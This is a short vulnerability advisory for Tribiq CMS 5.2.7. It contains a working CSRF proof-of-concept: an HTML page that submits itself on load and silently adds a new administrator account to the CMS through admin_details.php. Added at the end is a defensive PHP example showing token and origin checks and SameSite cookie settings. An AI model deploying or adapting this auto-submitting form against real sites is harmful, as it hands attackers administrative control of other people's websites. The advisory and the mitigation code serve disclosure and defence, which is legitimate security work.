
Tribiq CMS 5.2.7 CSRF: Editing and Adding Administrator Accounts

# Title: Tribiq CMS CSRF - Adding/Editing new administrator account
# Discovered by: Yashar shahinzadeh
# Vendor: http://sourceforge.net/projects/tribiq/
# Tested on: Linux & Windows, PHP 5.2.9
# Affected version: 5.2.7

Summary:
========
1. CSRF - Adding administrator account

1. CSRF - Adding administrator account:
=======================================
From my standpoint, Tribiq is a solid CMS that is immune to many well-known vulnerabilities, CSRF aside. Many damaging actions can be performed by an attacker through CSRF; the critical ones are changing the administrator password or adding a new administrator. Below is an example of adding a new administrator account. The attack is straightforward to carry out, and afterwards a plain-text response such as the following appears:

{"adminId":20,"adminType":"local"}

    <html>
    <body onload="submitForm()">
    <form name="myForm" id="myForm"
    action="http:// HdhCmsTest2cto测试数据 /community-5.2.7c/community-5.2.7c/tb/ajax/admin_details.php" method="post">
    <input type="hidden" name="save" value="true">
    <input type="hidden" name="adminType" value="local">
    <input type="hidden" name="formMode" value="edit">
    <input type="hidden" name="username" value="Yashar">
    <input type="hidden" name="password" value="Yashar123">
    <input type="hidden" name="password_reconfirm" value="Yashar123">
    <input type="hidden" name="first_name" value="test">
    <input type="hidden" name="last_name" value="test">
    <input type="hidden" name="email" value="test@test测试数据">
    </form>
    <script type='text/javascript'>document.myForm.submit();</script>
    </body>
    </html>

/** Yashar shahinzadeh **/
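As an added, defender-side example that is not part of the advisory or of Tribiq's own code: the synchronizer-token and origin check that a PHP handler such as admin_details.php is missing, and which would make a cross-site form post like the one above fail before any administrator record is touched. The function names, the session key and the `csrf_token` field name are assumptions for this illustration.

```php
<?php
// Added example (not Tribiq's code): CSRF protection for a state-changing
// handler that acts on "save=true". Names below are assumed, not the CMS's own.
session_start();

// Issue one random token per session and embed it in every state-changing form.
function csrf_token(): string {
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// A POST is accepted only if the submitted token equals the session token
// (constant-time compare) and any Origin/Referer header names our own host.
function csrf_request_is_valid(array $post, array $server, string $expectedHost): bool {
    if (($server['REQUEST_METHOD'] ?? '') !== 'POST') {
        return false;
    }
    $submitted = (string) ($post['csrf_token'] ?? '');
    $stored    = (string) ($_SESSION['csrf_token'] ?? '');
    if ($stored === '' || !hash_equals($stored, $submitted)) {
        return false;            // a cross-site form cannot read the session token
    }
    // Defence in depth: a form auto-submitted from another site carries that
    // site's Origin (or Referer), not ours.
    foreach (['HTTP_ORIGIN', 'HTTP_REFERER'] as $hdr) {
        if (!empty($server[$hdr])) {
            $host = (string) parse_url($server[$hdr], PHP_URL_HOST);
            if (strcasecmp($host, $expectedHost) !== 0) {
                return false;
            }
        }
    }
    return true;
}

// Handler: check first, act second.
if (isset($_POST['save']) && $_POST['save'] === 'true') {
    $ownHost = strtok($_SERVER['HTTP_HOST'] ?? '', ':');   // drop any :port
    if (!csrf_request_is_valid($_POST, $_SERVER, $ownHost)) {
        http_response_code(403);
        exit('{"error":"invalid CSRF token or origin"}');
    }
    // ... existing add/edit-administrator logic runs only past this point ...
}
?>
<form method="post" action="admin_details.php">
  <input type="hidden" name="csrf_token" value="<?= htmlspecialchars(csrf_token()) ?>">
  <!-- username, password and the other fields unchanged -->
</form>
```

Pair this with a `SameSite=Lax` or `Strict` attribute on the session cookie so that a cross-site POST does not carry the admin session at all; the token check remains the primary control because older browsers ignore the attribute.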
